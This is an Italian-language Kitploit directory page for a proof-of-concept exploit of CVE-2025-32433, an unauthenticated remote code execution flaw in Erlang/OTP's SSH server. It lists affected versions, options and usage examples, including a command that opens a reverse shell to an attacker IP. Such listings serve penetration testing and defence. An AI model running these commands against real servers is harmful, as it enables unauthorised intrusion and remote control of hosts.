Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — La vulnerabilità consente a un attaccante con accesso di rete a un server SSH Erlang/OTP di eseguire codice arbitrario senza previa autenticazione. | Kitploit
Strumenti/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
Analisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

La vulnerabilità consente a un attaccante con accesso di rete a un server SSH Erlang/OTP di eseguire codice arbitrario senza previa autenticazione.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1621 anno faNon ancora revisionato

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

La vulnerabilità consente a un aggressore con accesso di rete a un server SSH Erlang/OTP di eseguire codice arbitrario senza previa autenticazione.

Descrizione

È stata identificata una grave vulnerabilità nel server SSH Erlang/OTP che potrebbe consentire a un aggressore di eseguire codice in remoto senza autenticazione (RCE). Sfruttando un difetto nella gestione dei messaggi del protocollo SSH, un attore malintenzionato potrebbe ottenere accesso non autorizzato ai sistemi interessati ed eseguire comandi arbitrari senza disporre di credenziali valide. Ciò potrebbe portare alla compromissione di tali host, consentendo a terzi l'accesso non autorizzato e la manipolazione di dati sensibili, oppure attacchi di denial-of-service.

Versioni interessate

root@kitploit:~
OTP-27.3.2 e versioni precedenti
OTP-26.2.5.10 e versioni precedenti
OTP-25.3.2.19 e versioni precedenti

Funzionalità

  • Controllo vulnerabilità: determina se un target è vulnerabile a CVE-2025-32433.
  • Esecuzione exploit: esegue comandi arbitrari.
  • Reverse Shell: avvia una reverse shell basata su bash.

Utilizzo

root@kitploit:~
python cve-2025-32433.py <host> [options]

Opzioni:

root@kitploit:~
-p PORT, --port PORT: porta SSH (default: 22)

-t TIMEOUT, --timeout TIMEOUT: timeout di connessione in secondi (default: 5)

-c COMMAND, --command COMMAND: comando personalizzato da eseguire

--check: controlla se il target è vulnerabile

-u urls.txt, --urlfile urls.txt: file contenente l'elenco degli host da scansionare (uno per riga)

-o output.txt, --output output.txt: file di output per salvare i risultati.

--shell: avvia una reverse shell

--lhost LHOST: IP dell'attaccante per la reverse shell

--lport LPORT: porta dell'attaccante per la reverse shell (default: 4444)

Esempi:

Verifica della vulnerabilità:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

Esecuzione di un comando:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

Avvio di una reverse shell:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Riferimenti

GitHub Advisory

NVD CVE-2025-32433

Platform Security

Scarica lo strumento